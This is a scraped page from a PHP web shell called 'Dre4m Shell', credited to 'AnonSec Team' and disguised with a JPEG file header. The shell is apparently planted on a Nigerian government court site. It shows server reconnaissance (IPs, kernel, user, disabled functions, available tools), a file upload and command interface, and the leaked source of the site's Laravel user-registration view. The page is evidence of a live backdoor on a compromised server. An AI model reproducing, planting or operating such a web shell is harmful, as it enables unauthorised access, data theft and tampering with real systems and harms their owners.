ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.147.78.179
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/51dcd843d3f5a27b9f6508d60a93c0dde9cbdf41.php
<?php $__env->startSection('pageTitle'); ?>
  Register New User
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
  <form method="post" action="<?php echo e(url('/user/store')); ?>">
    <?php echo e(csrf_field()); ?>

  <div class="box box-default">

            <div class="col-md-12 text-success"><!--2nd col-->
                <big><b><?php echo $__env->yieldContent('pageTitle'); ?></b></big>
            </div>
            <br />
            <hr >

        <div class="row" style="margin: 5px 10px;">
            <div class="col-md-12"><!--1st col-->
                <?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>
                <?php if(session('msg')): ?>
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> 
                        <?php echo e(session('msg')); ?>

                    </div>                        
                <?php endif; ?>
            </div>
            
            <div class="col-md-12"><!--2nd col-->
            <div class="row">
                                <div class="col-md-6">
                                <div class="form-group">
                                    <label for="userName">Email Address</label>
                                           <input type="Text" value="<?php echo e(old('email_address')); ?>" name="email_address" class="form-control">
                                        </div>
                                    </div>

                                    <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="userName">User Name</label>
                                          <input type="Text" value="<?php echo e(old('userName')); ?>"  id="user_name" name="userName" class="form-control">
                                        </div>
                                    </div>
                                </div>
                  <div class="row">
                      <div class="col-md-6">
                                <div class="form-group">
                                    <label for="first_name">First name</label>
                                           <input type="Text" id="first_name" value="<?php echo e(old('first_name')); ?>" name="first_name" class="form-control">
                                        </div>
                                    </div>

                                    <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="last_name">Last Name</label>
                                          <input type="Text" value="<?php echo e(old('last_name')); ?>" name="last_name" id="last_name" class="form-control">
                                        </div>
                                    </div>
                                </div>

                                
                                
                                
                                
                                <div class="row">
        
                                  <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="role">Role</label>
                                          <select name="role_id" class="form-control">
                                          <option>Select a role</option>
                                            <?php $__currentLoopData = $roles; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $role): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                            <option value="<?php echo e($role->roleID); ?>"><?php echo e($role->rolename); ?></option>
                                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                          </select>
                                        </div>
                                    </div>

                                    <div class="col-md-3">
                                      <div class="form-group">
                                        <label for="division">Division</label>
                                        <select name="division" class="form-control">
                                        <option>Select Division</option>
                                          <?php $__currentLoopData = $divisions; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $division): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                          <option value="<?php echo e($division->divisionID); ?>"><?php echo e($division->division); ?></option>
                                          <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                        </select>
                                      </div>
                                    </div>
                                    <div class="col-md-3">
                                      <div class="form-group">
                                        <label for="global">Is Global User</label>
                                        <select name="isGlobal" class="form-control">
                                        
                                          <option value="0">No</option>
                                          <option value="1">Yes</option>
                                        </select>
                                      </div>
                                    </div>

                                    <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="password">Password</label>
                                          <input type="password" name="password" class="form-control" value="" >
                                        </div>
                                    </div>
                                    <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="password">Confirm Password</label>
                                          <input type="password" name="cpassword" class="form-control" >
                                        </div>
                                    </div>

                                    <div class="col-md-6 col-md-offset-6">
                                        <div class="form-group">
                                            <label for=""></label>
                                            <div align="right">
                                                <button class="btn btn-success" type="submit"> Create User Account </button>
                                            </div>
                                    </div>
                            </div>
                      </div>
                </div>
        </div><!-- /.col -->
    </div><!-- /.row -->
  </form>
<?php $__env->stopSection(); ?>


<?php $__env->startSection('scripts'); ?>
<script>


$("#last_name , #first_name").bind('input', ()=>{
    
    var first_name = $("#first_name").val();
    var last_name = $("#last_name") .val();
    if( first_name !== " " && last_name !== " " ){
          //set the username field 
        //$("#user_name").val( first_name+'_'+last_name );
    }

  
})



</script>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH C:\xampp\htdocs\nicngrp\resources\views/auth/register.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team